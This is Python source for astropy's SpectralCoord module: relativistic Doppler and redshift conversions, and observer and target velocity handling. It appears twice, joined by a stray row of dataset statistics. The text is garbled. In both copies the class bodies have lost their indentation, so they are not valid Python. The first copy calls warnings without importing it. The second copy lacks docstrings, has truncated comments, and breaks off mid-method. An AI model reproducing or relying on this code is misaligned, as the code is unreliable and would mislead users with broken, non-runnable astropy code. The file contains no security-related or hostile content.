from textwrap import indent
import astropy.units as u
import numpy as np
from astropy.constants import c
from astropy.coordinates import (ICRS,
CartesianDifferential,
CartesianRepresentation, SkyCoord)
from astropy.coordinates.spectral_quantity import SpectralQuantity
from astropy.coordinates.baseframe import (BaseCoordinateFrame,
frame_transform_graph)
from astropy.utils.exceptions import AstropyUserWarning
__all__ = ['SpectralCoord']
class NoVelocityWarning(AstropyUserWarning):
    """Emitted when a coordinate has no velocity and zero velocity is assumed."""
    pass
class NoDistanceWarning(AstropyUserWarning):
    """Emitted when a coordinate has no distance and a default one is assumed."""
    pass
# Convenience velocity unit used throughout this module.
KMS = u.km / u.s
# Speed of light expressed in km/s, precomputed once.
C_KMS = c.to(KMS)
# A zero 3-velocity, attached to coordinates that carry no differentials.
ZERO_VELOCITIES = CartesianDifferential([0, 0, 0] * KMS)
# Default distance to use for target when none is provided
DEFAULT_DISTANCE = 1e6 * u.kpc
# We don't want to run doctests in the docstrings we inherit from Quantity
__doctest_skip__ = ['SpectralCoord.*']
def _velocity_to_redshift(velocity):
    """Return the relativistic redshift corresponding to ``velocity``."""
    v_over_c = velocity / C_KMS
    doppler_factor = np.sqrt((1 + v_over_c) / (1 - v_over_c))
    return doppler_factor - 1
def _redshift_to_velocity(redshift):
    """Return the velocity corresponding to a relativistic ``redshift``."""
    shifted_sq = (redshift + 1) ** 2
    return C_KMS * (shifted_sq - 1) / (shifted_sq + 1)
def _apply_relativistic_doppler_shift(scoord, velocity):
    """Return ``scoord`` Doppler-shifted by ``velocity``.

    The full relativistic Doppler formula is applied regardless of the
    Doppler convention of the input; a `SpectralQuantity` expressed as a
    velocity is temporarily converted through frequency space. Positive
    velocities redshift the spectral quantity, negative ones blueshift it.
    """
    # Work on a plain SpectralQuantity view: metadata of sub-classes may not
    # remain correct/consistent through the shift.
    squantity = scoord.view(SpectralQuantity)
    beta = velocity / c
    doppler_factor = np.sqrt((1 + beta) / (1 - beta))
    unit = squantity.unit
    if unit.is_equivalent(u.m):
        # Wavelength grows with redshift.
        return squantity * doppler_factor
    if (unit.is_equivalent(u.Hz) or unit.is_equivalent(u.eV)
            or unit.is_equivalent(1 / u.m)):
        # Frequency, energy and wavenumber all shrink with redshift.
        return squantity / doppler_factor
    if unit.is_equivalent(KMS):
        # Velocity: shift in frequency space, then convert back.
        return (squantity.to(u.Hz) / doppler_factor).to(squantity.unit)
    # pragma: no cover - SpectralQuantity should never carry other units
    raise RuntimeError(f"Unexpected units in velocity shift: {squantity.unit}. "
                       "This should not happen, so please report this in the "
                       "astropy issue tracker!")
def update_differentials_to_match(original, velocity_reference, preserve_observer_frame=False):
    """
    Given an original coordinate object, update the differentials so that
    the final coordinate is at the same location as the original coordinate
    but co-moving with the velocity reference object.
    If ``preserve_observer_frame`` is set to True, the resulting object will be
    in the frame of the original coordinate, otherwise it will be in the frame
    of the velocity reference.
    """
    if not velocity_reference.data.differentials:
        raise ValueError("Reference frame has no velocities")
    # If the reference has an obstime already defined, we should ignore
    # it and stick with the original observer obstime.
    if 'obstime' in velocity_reference.frame_attributes and hasattr(original, 'obstime'):
        velocity_reference = velocity_reference.replicate(obstime=original.obstime)
    # We transform both coordinates to ICRS for simplicity and because we know
    # it's a simple frame that is not time-dependent (it could be that both
    # the original and velocity_reference frame are time-dependent)
    original_icrs = original.transform_to(ICRS())
    velocity_reference_icrs = velocity_reference.transform_to(ICRS())
    # Take the reference's velocity vector ...
    differentials = velocity_reference_icrs.data.represent_as(CartesianRepresentation,
                                                              CartesianDifferential).differentials
    # ... and attach it to the original's position.
    data_with_differentials = (original_icrs.data.represent_as(CartesianRepresentation)
                               .with_differentials(differentials))
    final_icrs = original_icrs.realize_frame(data_with_differentials)
    if preserve_observer_frame:
        final = final_icrs.transform_to(original)
    else:
        final = final_icrs.transform_to(velocity_reference)
    return final.replicate(representation_type=CartesianRepresentation,
                           differential_type=CartesianDifferential)
def attach_zero_velocities(coord):
    """Return ``coord`` re-realized with all velocity differentials set to zero."""
    stationary_data = coord.cartesian.with_differentials(ZERO_VELOCITIES)
    return coord.realize_frame(stationary_data)
def _get_velocities(coord):
    """Return the velocity of ``coord``, or zero if it has no differentials."""
    has_velocity = 's' in coord.data.differentials
    return coord.velocity if has_velocity else ZERO_VELOCITIES
class SpectralCoord(SpectralQuantity):
"""
A spectral coordinate with its corresponding unit.
.. note:: The |SpectralCoord| class is new in Astropy v4.1 and should be
considered experimental at this time. Note that we do not fully
support cases where the observer and target are moving
relativistically relative to each other, so care should be taken
in those cases. It is possible that there will be API changes in
future versions of Astropy based on user feedback. If you have
specific ideas for how it might be improved, please let us know
on the `astropy-dev mailing list`_ or at
http://feedback.astropy.org.
Parameters
----------
value : ndarray or `~astropy.units.Quantity` or `SpectralCoord`
Spectral values, which should be either wavelength, frequency,
energy, wavenumber, or velocity values.
unit : str or `~astropy.units.Unit`
Unit for the given spectral values.
observer : `~astropy.coordinates.BaseCoordinateFrame` or `~astropy.coordinates.SkyCoord`, optional
The coordinate (position and velocity) of observer. If no velocities
are present on this object, the observer is assumed to be stationary
relative to the frame origin.
target : `~astropy.coordinates.BaseCoordinateFrame` or `~astropy.coordinates.SkyCoord`, optional
The coordinate (position and velocity) of target. If no velocities
are present on this object, the target is assumed to be stationary
relative to the frame origin.
radial_velocity : `~astropy.units.Quantity`, optional
The radial velocity of the target with respect to the observer. This
can only be specified if ``redshift`` is not specified.
redshift : float, optional
The relativistic redshift of the target with respect to the observer.
This can only be specified if ``radial_velocity`` cannot be specified.
doppler_rest : `~astropy.units.Quantity`, optional
The rest value to use when expressing the spectral value as a velocity.
doppler_convention : str, optional
The Doppler convention to use when expressing the spectral value as a velocity.
"""
@u.quantity_input(radial_velocity=u.km/u.s)
def __new__(cls, value, unit=None,
observer=None, target=None,
radial_velocity=None, redshift=None,
**kwargs):
obj = super().__new__(cls, value, unit=unit, **kwargs)
# There are two main modes of operation in this class. Either the
# observer and target are both defined, in which case the radial
# velocity and redshift are automatically computed from these, or
# only one of the observer and target are specified, along with a
# manually specified radial velocity or redshift. So if a target and
# observer are both specified, we can't also accept a radial velocity
# or redshift.
if target is not None and observer is not None:
if radial_velocity is not None or redshift is not None:
raise ValueError("Cannot specify radial velocity or redshift if both "
"target and observer are specified")
# We only deal with redshifts here and in the redshift property.
# Otherwise internally we always deal with velocities.
if redshift is not None:
if radial_velocity is not None:
raise ValueError("Cannot set both a radial velocity and redshift")
redshift = u.Quantity(redshift)
# For now, we can't specify redshift=u.one in quantity_input above
# and have it work with plain floats, but if that is fixed, for
# example as in https://github.com/astropy/astropy/pull/10232, we
# can remove the check here and add redshift=u.one to the decorator
if not redshift.unit.is_equivalent(u.one):
raise u.UnitsError('redshift should be dimensionless')
radial_velocity = _redshift_to_velocity(redshift)
# If we're initializing from an existing SpectralCoord, keep any
# parameters that aren't being overridden
if observer is None:
observer = getattr(value, 'observer', None)
if target is None:
target = getattr(value, 'target', None)
# As mentioned above, we should only specify the radial velocity
# manually if either or both the observer and target are not
# specified.
if observer is None or target is None:
if radial_velocity is None:
radial_velocity = getattr(value, 'radial_velocity', None)
obj._radial_velocity = radial_velocity
obj._observer = cls._validate_coordinate(observer, label='observer')
obj._target = cls._validate_coordinate(target, label='target')
return obj
def __array_finalize__(self, obj):
super().__array_finalize__(obj)
self._radial_velocity = getattr(obj, '_radial_velocity', None)
self._observer = getattr(obj, '_observer', None)
self._target = getattr(obj, '_target', None)
@staticmethod
def _validate_coordinate(coord, label=''):
"""
Checks the type of the frame and whether a velocity differential and a
distance has been defined on the frame object.
If no distance is defined, the target is assumed to be "really far
away", and the observer is assumed to be "in the solar system".
Parameters
----------
coord : `~astropy.coordinates.BaseCoordinateFrame`
The new frame to be used for target or observer.
label : str, optional
The name of the object being validated (e.g. 'target' or 'observer'),
which is then used in error messages.
"""
if coord is None:
return
if not issubclass(coord.__class__, BaseCoordinateFrame):
if isinstance(coord, SkyCoord):
coord = coord.frame
else:
raise TypeError(f"{label} must be a SkyCoord or coordinate frame instance")
# If the distance is not well-defined, ensure that it works properly
# for generating differentials
# TODO: change this to not set the distance and yield a warning once
# there's a good way to address this in astropy.coordinates
# https://github.com/astropy/astropy/issues/10247
with np.errstate(all='ignore'):
distance = getattr(coord, 'distance', None)
if distance is not None and distance.unit.physical_type == 'dimensionless':
coord = SkyCoord(coord, distance=DEFAULT_DISTANCE)
warnings.warn(
"Distance on coordinate object is dimensionless, an "
f"abritrary distance value of {DEFAULT_DISTANCE} will be set instead.",
NoDistanceWarning)
# If the observer frame does not contain information about the
# velocity of the system, assume that the velocity is zero in the
# system.
if 's' not in coord.data.differentials:
warnings.warn(
"No velocity defined on frame, assuming {}.".format(
ZERO_VELOCITIES),
NoVelocityWarning)
coord = attach_zero_velocities(coord)
return coord
def replicate(self, value=None, unit=None,
observer=None, target=None,
radial_velocity=None, redshift=None,
doppler_convention=None, doppler_rest=None,
copy=False):
"""
Return a replica of the `SpectralCoord`, optionally changing the
values or attributes.
Note that no conversion is carried out by this method - this keeps
all the values and attributes the same, except for the ones explicitly
passed to this method which are changed.
If ``copy`` is set to `True` then a full copy of the internal arrays
will be made. By default the replica will use a reference to the
original arrays when possible to save memory.
Parameters
----------
value : ndarray or `~astropy.units.Quantity` or `SpectralCoord`, optional
Spectral values, which should be either wavelength, frequency,
energy, wavenumber, or velocity values.
unit : str or `~astropy.units.Unit`
Unit for the given spectral values.
observer : `~astropy.coordinates.BaseCoordinateFrame` or `~astropy.coordinates.SkyCoord`, optional
The coordinate (position and velocity) of observer.
target : `~astropy.coordinates.BaseCoordinateFrame` or `~astropy.coordinates.SkyCoord`, optional
The coordinate (position and velocity) of target.
radial_velocity : `~astropy.units.Quantity`, optional
The radial velocity of the target with respect to the observer.
redshift : float, optional
The relativistic redshift of the target with respect to the observer.
doppler_rest : `~astropy.units.Quantity`, optional
The rest value to use when expressing the spectral value as a velocity.
doppler_convention : str, optional
The Doppler convention to use when expressing the spectral value as a velocity.
copy : bool, optional
If `True`, and ``value`` is not specified, the values are copied to
the new `SkyCoord` - otherwise a reference to the same values is used.
Returns
-------
sc : `SpectralCoord` object
Replica of this object
"""
if isinstance(value, u.Quantity):
if unit is not None:
raise ValueError("Cannot specify value as a Quantity and also specify unit")
else:
value, unit = value.value, value.unit
value = value if value is not None else self.value
unit = unit or self.unit
observer = self._validate_coordinate(observer) or self.observer
target = self._validate_coordinate(target) or self.target
doppler_convention = doppler_convention or self.doppler_convention
doppler_rest = doppler_rest or self.doppler_rest
# If value is being taken from self and copy is Tru
if copy:
value = value.copy()
# Only include radial_velocity if it is not auto-computed from the
# observer and target.
if (self.observer is None or self.target is None) and radial_velocity is None and redshift is None:
radial_velocity = self.radial_velocity
with warnings.catch_warnings():
warnings.simplefilter('ignore', NoVelocityWarning)
return self.__class__(value=value, unit=unit,
observer=observer, target=target,
radial_velocity=radial_velocity, redshift=redshift,
doppler_convention=doppler_convention, doppler_rest=doppler_rest, copy=False)
@property
def quantity(self):
"""
Convert the ``SpectralCoord`` to a `~astropy.units.Quantity`.
Equivalent to ``self.view(u.Quantity)``.
Returns
-------
`~astropy.units.Quantity`
This object viewed as a `~astropy.units.Quantity`.
"""
return self.view(u.Quantity)
@property
def observer(self):
"""
The coordinates of the observer.
If set, and a target is set as well, this will override any explicit
radial velocity passed in.
Returns
-------
`~astropy.coordinates.BaseCoordinateFrame`
The astropy coordinate frame representing the observation.
"""
return self._observer
@observer.setter
def observer(self, value):
if self.observer is not None:
raise ValueError("observer has already been set")
self._observer = self._validate_coordinate(value, label='observer')
# Switch to auto-computing radial velocity
if self._target is not None:
self._radial_velocity = None
@property
def target(self):
"""
The coordinates of the target being observed.
If set, and an observer is set as well, this will override any explicit
radial velocity passed in.
Returns
-------
`~astropy.coordinates.BaseCoordinateFrame`
The astropy coordinate frame representing the target.
"""
return self._target
@target.setter
def target(self, value):
if self.target is not None:
raise ValueError("target has already been set")
self._target = self._validate_coordinate(value, label='target')
# Switch to auto-computing radial velocity
if self._observer is not None:
self._radial_velocity = None
@property
def radial_velocity(self):
"""
Radial velocity of target relative to the observer.
Returns
-------
`~astropy.units.Quantity`
Radial velocity of target.
Notes
-----
This is different from the ``.radial_velocity`` property of a
coordinate frame in that this calculates the radial velocity with
respect to the *observer*, not the origin of the frame.
"""
if self._observer is None or self._target is None:
if self._radial_velocity is None:
return 0 * KMS
else:
return self._radial_velocity
else:
return self._calculate_radial_velocity(self._observer, self._target,
as_scalar=True)
@property
def redshift(self):
"""
Redshift of target relative to observer. Calculated from the radial
velocity.
Returns
-------
float
Redshift of target.
"""
return _velocity_to_redshift(self.radial_velocity)
@staticmethod
def _calculate_radial_velocity(observer, target, as_scalar=False):
"""
Compute the line-of-sight velocity from the observer to the target.
Parameters
----------
observer : `~astropy.coordinates.BaseCoordinateFrame`
The frame of the observer.
target : `~astropy.coordinates.BaseCoordinateFrame`
The frame of the target.
as_scalar : bool
If `True`, the magnitude of the velocity vector will be returned,
otherwise the full vector will be returned.
Returns
-------
`~astropy.units.Quantity`
The radial velocity of the target with respect to the observer.
"""
# Convert observer and target to ICRS to avoid finite differencing
# calculations that lack numerical precision.
observer_icrs = observer.transform_to(ICRS())
target_icrs = target.transform_to(ICRS())
pos_hat = SpectralCoord._normalized_position_vector(observer_icrs, target_icrs)
d_vel = target_icrs.velocity - observer_icrs.velocity
vel_mag = pos_hat.dot(d_vel)
if as_scalar:
return vel_mag
else:
return vel_mag * pos_hat
@staticmethod
def _normalized_position_vector(observer, target):
"""
Calculate the normalized position vector between two frames.
Parameters
----------
observer : `~astropy.coordinates.BaseCoordinateFrame` or `~astropy.coordinates.SkyCoord`
The observation frame or coordinate.
target : `~astropy.coordinates.BaseCoordinateFrame` or `~astropy.coordinates.SkyCoord`
The target frame or coordinate.
Returns
-------
pos_hat : `BaseRepresentation`
Position representation.
"""
d_pos = (target.cartesian.without_differentials() -
observer.cartesian.without_differentials())
dp_norm = d_pos.norm()
# Reset any that are 0 to 1 to avoid nans from 0/0
dp_norm[dp_norm == 0] = 1 * dp_norm.unit
pos_hat = d_pos / dp_norm
return pos_hat
@u.quantity_input(velocity=u.km/u.s)
def with_observer_stationary_relative_to(self, frame, velocity=None, preserve_observer_frame=False):
"""
A new `SpectralCoord` with the velocity of the observer altered,
but not the position.
If a coordinate frame is specified, the observer velocities will be
modified to be stationary in the specified frame. If a coordinate
instance is specified, optionally with non-zero velocities, the
observer velocities will be updated so that the observer is co-moving
with the specified coordinates.
Parameters
----------
frame : str, `~astropy.coordinates.BaseCoordinateFrame` or `~astropy.coordinates.SkyCoord`
The observation frame in which the observer will be stationary. This
can be the name of a frame (e.g. 'icrs'), a frame class, frame instance
with no data, or instance with data. This can optionally include
velocities.
velocity : `~astropy.units.Quantity` or `~astropy.coordinates.CartesianDifferential`, optional
If ``frame`` does not contain velocities, these can be specified as
a 3-element `~astropy.units.Quantity`. In the case where this is
also not specified, the velocities default to zero.
preserve_observer_frame : bool
If `True`, the final observer frame class will be the same as the
original one, and if `False` it will be the frame of the velocity
reference class.
Returns
-------
new_coord : `SpectralCoord`
The new coordinate object representing the spectral data
transformed based on the observer's new velocity frame.
"""
if self.observer is None or self.target is None:
raise ValueError("This method can only be used if both observer "
"and target are defined on the SpectralCoord.")
# Start off by extracting frame if a SkyCoord was passed in
if isinstance(frame, SkyCoord):
frame = frame.frame
if isinstance(frame, BaseCoordinateFrame):
if not frame.has_data:
frame = frame.realize_frame(CartesianRepresentation(0 * u.km, 0 * u.km, 0 * u.km))
if frame.data.differentials:
if velocity is not None:
raise ValueError('frame already has differentials, cannot also specify velocity')
# otherwise frame is ready to go
else:
if velocity is None:
differentials = ZERO_VELOCITIES
else:
differentials = CartesianDifferential(velocity)
frame = frame.realize_frame(frame.data.with_differentials(differentials))
if isinstance(frame, (type, str)):
if isinstance(frame, type):
frame_cls = frame
elif isinstance(frame, str):
frame_cls = frame_transform_graph.lookup_name(frame)
if velocity is None:
velocity = 0 * u.m / u.s, 0 * u.m / u.s, 0 * u.m / u.s
elif velocity.shape != (3,):
raise ValueError('velocity should be a Quantity vector with 3 elements')
frame = frame_cls(0 * u.m, 0 * u.m, 0 * u.m,
*velocity,
representation_type='cartesian',
differential_type='cartesian')
observer = update_differentials_to_match(self.observer, frame,
preserve_observer_frame=preserve_observer_frame)
# Calculate the initial and final los velocity
init_obs_vel = self._calculate_radial_velocity(self.observer, self.target, as_scalar=True)
fin_obs_vel = self._calculate_radial_velocity(observer, self.target, as_scalar=True)
# Apply transformation to data
new_data = _apply_relativistic_doppler_shift(self, fin_obs_vel - init_obs_vel)
new_coord = self.replicate(value=new_data, observer=observer)
return new_coord
def with_radial_velocity_shift(self, target_shift=None, observer_shift=None):
"""
Apply a velocity shift to this spectral coordinate.
The shift can be provided as a redshift (float value) or radial
velocity (`~astropy.units.Quantity` with physical type of 'speed').
Parameters
----------
target_shift : float or `~astropy.units.Quantity`
Shift value to apply to current target.
observer_shift : float or `~astropy.units.Quantity`
Shift value to apply to current observer.
Returns
-------
`SpectralCoord`
New spectral coordinate with the target/observer velocity changed
to incorporate the shift. This is always a new object even if
``target_shift`` and ``observer_shift`` are both `None`.
"""
if observer_shift is not None and (self.target is None or
self.observer is None):
raise ValueError("Both an observer and target must be defined "
"before applying a velocity shift.")
for arg in [x for x in [target_shift, observer_shift] if x is not None]:
if isinstance(arg, u.Quantity) and not arg.unit.is_equivalent((u.one, KMS)):
raise u.UnitsError("Argument must have unit physical type "
"'speed' for radial velocty or "
"'dimensionless' for redshift.")
# The target or observer value is defined but is not a quantity object,
# assume it's a redshift float value and convert to velocity
if target_shift is None:
if self._observer is None or self._target is None:
return self.replicate()
target_shift = 0 * KMS
else:
target_shift = u.Quantity(target_shift)
if target_shift.unit.physical_type == 'dimensionless':
target_shift = _redshift_to_velocity(target_shift)
if self._observer is None or self._target is None:
return self.replicate(value=_apply_relativistic_doppler_shift(self, target_shift),
radial_velocity=self.radial_velocity + target_shift)
if observer_shift is None:
observer_shift = 0 * KMS
else:
observer_shift = u.Quantity(observer_shift)
if observer_shift.unit.physical_type == 'dimensionless':
observer_shift = _redshift_to_velocity(observer_shift)
target_icrs = self._target.transform_to(ICRS())
observer_icrs = self._observer.transform_to(ICRS())
pos_hat = SpectralCoord._normalized_position_vector(observer_icrs, target_icrs)
target_velocity = _get_velocities(target_icrs) + target_shift * pos_hat
observer_velocity = _get_velocities(observer_icrs) + observer_shift * pos_hat
target_velocity = CartesianDifferential(target_velocity.xyz)
observer_velocity = CartesianDifferential(observer_velocity.xyz)
new_target = (target_icrs
.realize_frame(target_icrs.cartesian.with_differentials(target_velocity))
.transform_to(self._target))
new_observer = (observer_icrs
.realize_frame(observer_icrs.cartesian.with_differentials(observer_velocity))
.transform_to(self._observer))
init_obs_vel = self._calculate_radial_velocity(observer_icrs, target_icrs, as_scalar=True)
fin_obs_vel = self._calculate_radial_velocity(new_observer, new_target, as_scalar=True)
new_data = _apply_relativistic_doppler_shift(self, fin_obs_vel - init_obs_vel)
return self.replicate(value=new_data,
observer=new_observer,
target=new_target)
def to_rest(self):
"""
Transforms the spectral axis to the rest frame.
"""
if self.observer is not None and self.target is not None:
return self.with_observer_stationary_relative_to(self.target)
result = _apply_relativistic_doppler_shift(self, -self.radial_velocity)
return self.replicate(value=result, radial_velocity=0. * KMS, redshift=None)
    def __repr__(self):
        """Return a multi-line string representation of the coordinate.

        Shows the observer/target frames (if set), the observer-to-target
        radial velocity and redshift, any Doppler settings, and finally the
        array values with their unit.
        """
        prefixstr = '<' + self.__class__.__name__ + ' '
        # radial_velocity/redshift may not be derivable from the current
        # state; fall back to a placeholder rather than letting repr() fail.
        try:
            radial_velocity = self.radial_velocity
            redshift = self.redshift
        except ValueError:
            radial_velocity = redshift = 'Undefined'
        repr_items = [f'{prefixstr}']
        if self.observer is not None:
            # Indent the nested frame repr so it aligns under its label.
            observer_repr = indent(repr(self.observer), 14 * ' ').lstrip()
            repr_items.append(f'    observer: {observer_repr}')
        if self.target is not None:
            target_repr = indent(repr(self.target), 12 * ' ').lstrip()
            repr_items.append(f'    target: {target_repr}')
        # Only show velocity info when it is defined, and note whether it was
        # computed from the frames above or set explicitly.
        if (self._observer is not None and self._target is not None) or self._radial_velocity is not None:
            if self.observer is not None and self.target is not None:
                repr_items.append('    observer to target (computed from above):')
            else:
                repr_items.append('    observer to target:')
            repr_items.append(f'      radial_velocity={radial_velocity}')
            repr_items.append(f'      redshift={redshift}')
        if self.doppler_rest is not None or self.doppler_convention is not None:
            repr_items.append(f'    doppler_rest={self.doppler_rest}')
            repr_items.append(f'    doppler_convention={self.doppler_convention}')
        arrstr = np.array2string(self.view(np.ndarray), separator=', ',
                                 prefix='  ')
        if len(repr_items) == 1:
            # No metadata at all: compact single-line form.
            repr_items[0] += f'{arrstr}{self._unitstr:s}'
        else:
            # Wrap the metadata block in parentheses before the array values.
            repr_items[1] = '   (' + repr_items[1].lstrip()
            repr_items[-1] += ')'
            repr_items.append(f'  {arrstr}{self._unitstr:s}')
        return '\n'.join(repr_items) + '>'
| 41.219922 | 111 | 0.638107 | import warnings
from textwrap import indent
import astropy.units as u
import numpy as np
from astropy.constants import c
from astropy.coordinates import (ICRS,
CartesianDifferential,
CartesianRepresentation, SkyCoord)
from astropy.coordinates.spectral_quantity import SpectralQuantity
from astropy.coordinates.baseframe import (BaseCoordinateFrame,
frame_transform_graph)
from astropy.utils.exceptions import AstropyUserWarning
__all__ = ['SpectralCoord']
class NoVelocityWarning(AstropyUserWarning):
    """Warning emitted when a coordinate frame carries no velocity data."""
    pass
class NoDistanceWarning(AstropyUserWarning):
    """Warning emitted when a coordinate has no usable distance."""
    pass
KMS = u.km / u.s
C_KMS = c.to(KMS)
ZERO_VELOCITIES = CartesianDifferential([0, 0, 0] * KMS)
DEFAULT_DISTANCE = 1e6 * u.kpc
__doctest_skip__ = ['SpectralCoord.*']
def _velocity_to_redshift(velocity):
    """Convert a radial velocity to the equivalent relativistic redshift.

    Uses the special-relativistic Doppler relation
    ``z = sqrt((1 + beta) / (1 - beta)) - 1`` with ``beta = v / c``.
    """
    beta = velocity / C_KMS
    doppler_factor = np.sqrt((1 + beta) / (1 - beta))
    return doppler_factor - 1
def _redshift_to_velocity(redshift):
    """Convert a relativistic redshift to the equivalent radial velocity.

    Inverts the relativistic Doppler relation:
    ``v = c * ((1 + z)**2 - 1) / ((1 + z)**2 + 1)``.
    """
    squared_factor = (1 + redshift) ** 2
    velocity = C_KMS * (squared_factor - 1) / (squared_factor + 1)
    return velocity
def _apply_relativistic_doppler_shift(scoord, velocity):
    """Apply a relativistic Doppler shift of ``velocity`` to ``scoord``.

    Wavelength-like quantities are multiplied by the Doppler factor,
    frequency/energy/wavenumber-like quantities are divided by it. Returns a
    plain ``SpectralQuantity`` view of the shifted values.
    """
    # NOTE: we deliberately don't keep sub-classes of SpectralQuantity intact
    squantity = scoord.view(SpectralQuantity)
    beta = velocity / c
    doppler_factor = np.sqrt((1 + beta) / (1 - beta))
    if squantity.unit.is_equivalent(u.m):  # wavelength
        return squantity * doppler_factor
    elif (squantity.unit.is_equivalent(u.Hz) or
          squantity.unit.is_equivalent(u.eV) or
          squantity.unit.is_equivalent(1 / u.m)):
        # frequency, energy or wavenumber
        return squantity / doppler_factor
    elif squantity.unit.is_equivalent(KMS):  # velocity
        # NOTE(review): relies on SpectralQuantity.to() performing the
        # Doppler conversion from velocity to frequency and back — confirm.
        return (squantity.to(u.Hz) / doppler_factor).to(squantity.unit)
    else:  # pragma: no cover
        raise RuntimeError(f"Unexpected units in velocity shift: {squantity.unit}. "
                           "This should not happen, so please report this in the "
                           "astropy issue tracker!")
def update_differentials_to_match(original, velocity_reference, preserve_observer_frame=False):
    """Return ``original`` with its velocities replaced by those of
    ``velocity_reference``.

    The reference must carry velocity differentials. The result is expressed
    in the reference's frame unless ``preserve_observer_frame`` is set, in
    which case the original frame is kept.
    """
    if not velocity_reference.data.differentials:
        raise ValueError("Reference frame has no velocities")
    # If the reference has an obstime already defined, we should ignore
    # it and stick with the original observer obstime.
    if 'obstime' in velocity_reference.frame_attributes and hasattr(original, 'obstime'):
        velocity_reference = velocity_reference.replicate(obstime=original.obstime)
    # We transform both coordinates to ICRS for simplicity because it is a
    # simple frame that is not time-dependent (both inputs could otherwise be
    # time-dependent frames).
    original_icrs = original.transform_to(ICRS())
    velocity_reference_icrs = velocity_reference.transform_to(ICRS())
    differentials = velocity_reference_icrs.data.represent_as(CartesianRepresentation,
                                                              CartesianDifferential).differentials
    # Keep the original's position, swap in the reference's velocities.
    data_with_differentials = (original_icrs.data.represent_as(CartesianRepresentation)
                               .with_differentials(differentials))
    final_icrs = original_icrs.realize_frame(data_with_differentials)
    if preserve_observer_frame:
        final = final_icrs.transform_to(original)
    else:
        final = final_icrs.transform_to(velocity_reference)
    return final.replicate(representation_type=CartesianRepresentation,
                           differential_type=CartesianDifferential)
def attach_zero_velocities(coord):
    """Return ``coord`` re-realized with zero velocity differentials attached."""
    zeroed = coord.cartesian.with_differentials(ZERO_VELOCITIES)
    return coord.realize_frame(zeroed)
def _get_velocities(coord):
    """Return the coordinate's velocity, or zero velocities if none are set."""
    has_velocity = 's' in coord.data.differentials
    return coord.velocity if has_velocity else ZERO_VELOCITIES
class SpectralCoord(SpectralQuantity):
@u.quantity_input(radial_velocity=u.km/u.s)
def __new__(cls, value, unit=None,
observer=None, target=None,
radial_velocity=None, redshift=None,
**kwargs):
obj = super().__new__(cls, value, unit=unit, **kwargs)
# or redshift.
if target is not None and observer is not None:
if radial_velocity is not None or redshift is not None:
raise ValueError("Cannot specify radial velocity or redshift if both "
"target and observer are specified")
# We only deal with redshifts here and in the redshift property.
# Otherwise internally we always deal with velocities.
if redshift is not None:
if radial_velocity is not None:
raise ValueError("Cannot set both a radial velocity and redshift")
redshift = u.Quantity(redshift)
# For now, we can't specify redshift=u.one in quantity_input above
if not redshift.unit.is_equivalent(u.one):
raise u.UnitsError('redshift should be dimensionless')
radial_velocity = _redshift_to_velocity(redshift)
# parameters that aren't being overridden
if observer is None:
observer = getattr(value, 'observer', None)
if target is None:
target = getattr(value, 'target', None)
if observer is None or target is None:
if radial_velocity is None:
radial_velocity = getattr(value, 'radial_velocity', None)
obj._radial_velocity = radial_velocity
obj._observer = cls._validate_coordinate(observer, label='observer')
obj._target = cls._validate_coordinate(target, label='target')
return obj
def __array_finalize__(self, obj):
super().__array_finalize__(obj)
self._radial_velocity = getattr(obj, '_radial_velocity', None)
self._observer = getattr(obj, '_observer', None)
self._target = getattr(obj, '_target', None)
@staticmethod
def _validate_coordinate(coord, label=''):
if coord is None:
return
if not issubclass(coord.__class__, BaseCoordinateFrame):
if isinstance(coord, SkyCoord):
coord = coord.frame
else:
raise TypeError(f"{label} must be a SkyCoord or coordinate frame instance")
# https://github.com/astropy/astropy/issues/10247
with np.errstate(all='ignore'):
distance = getattr(coord, 'distance', None)
if distance is not None and distance.unit.physical_type == 'dimensionless':
coord = SkyCoord(coord, distance=DEFAULT_DISTANCE)
warnings.warn(
"Distance on coordinate object is dimensionless, an "
f"abritrary distance value of {DEFAULT_DISTANCE} will be set instead.",
NoDistanceWarning)
# If the observer frame does not contain information about the
# velocity of the system, assume that the velocity is zero in the
# system.
if 's' not in coord.data.differentials:
warnings.warn(
"No velocity defined on frame, assuming {}.".format(
ZERO_VELOCITIES),
NoVelocityWarning)
coord = attach_zero_velocities(coord)
return coord
def replicate(self, value=None, unit=None,
observer=None, target=None,
radial_velocity=None, redshift=None,
doppler_convention=None, doppler_rest=None,
copy=False):
if isinstance(value, u.Quantity):
if unit is not None:
raise ValueError("Cannot specify value as a Quantity and also specify unit")
else:
value, unit = value.value, value.unit
value = value if value is not None else self.value
unit = unit or self.unit
observer = self._validate_coordinate(observer) or self.observer
target = self._validate_coordinate(target) or self.target
doppler_convention = doppler_convention or self.doppler_convention
doppler_rest = doppler_rest or self.doppler_rest
# If value is being taken from self and copy is Tru
if copy:
value = value.copy()
# Only include radial_velocity if it is not auto-computed from the
# observer and target.
if (self.observer is None or self.target is None) and radial_velocity is None and redshift is None:
radial_velocity = self.radial_velocity
with warnings.catch_warnings():
warnings.simplefilter('ignore', NoVelocityWarning)
return self.__class__(value=value, unit=unit,
observer=observer, target=target,
radial_velocity=radial_velocity, redshift=redshift,
doppler_convention=doppler_convention, doppler_rest=doppler_rest, copy=False)
@property
def quantity(self):
return self.view(u.Quantity)
@property
def observer(self):
return self._observer
@observer.setter
def observer(self, value):
if self.observer is not None:
raise ValueError("observer has already been set")
self._observer = self._validate_coordinate(value, label='observer')
# Switch to auto-computing radial velocity
if self._target is not None:
self._radial_velocity = None
@property
def target(self):
return self._target
@target.setter
def target(self, value):
if self.target is not None:
raise ValueError("target has already been set")
self._target = self._validate_coordinate(value, label='target')
# Switch to auto-computing radial velocity
if self._observer is not None:
self._radial_velocity = None
@property
def radial_velocity(self):
if self._observer is None or self._target is None:
if self._radial_velocity is None:
return 0 * KMS
else:
return self._radial_velocity
else:
return self._calculate_radial_velocity(self._observer, self._target,
as_scalar=True)
@property
def redshift(self):
return _velocity_to_redshift(self.radial_velocity)
@staticmethod
def _calculate_radial_velocity(observer, target, as_scalar=False):
# Convert observer and target to ICRS to avoid finite differencing
# calculations that lack numerical precision.
observer_icrs = observer.transform_to(ICRS())
target_icrs = target.transform_to(ICRS())
pos_hat = SpectralCoord._normalized_position_vector(observer_icrs, target_icrs)
d_vel = target_icrs.velocity - observer_icrs.velocity
vel_mag = pos_hat.dot(d_vel)
if as_scalar:
return vel_mag
else:
return vel_mag * pos_hat
@staticmethod
def _normalized_position_vector(observer, target):
d_pos = (target.cartesian.without_differentials() -
observer.cartesian.without_differentials())
dp_norm = d_pos.norm()
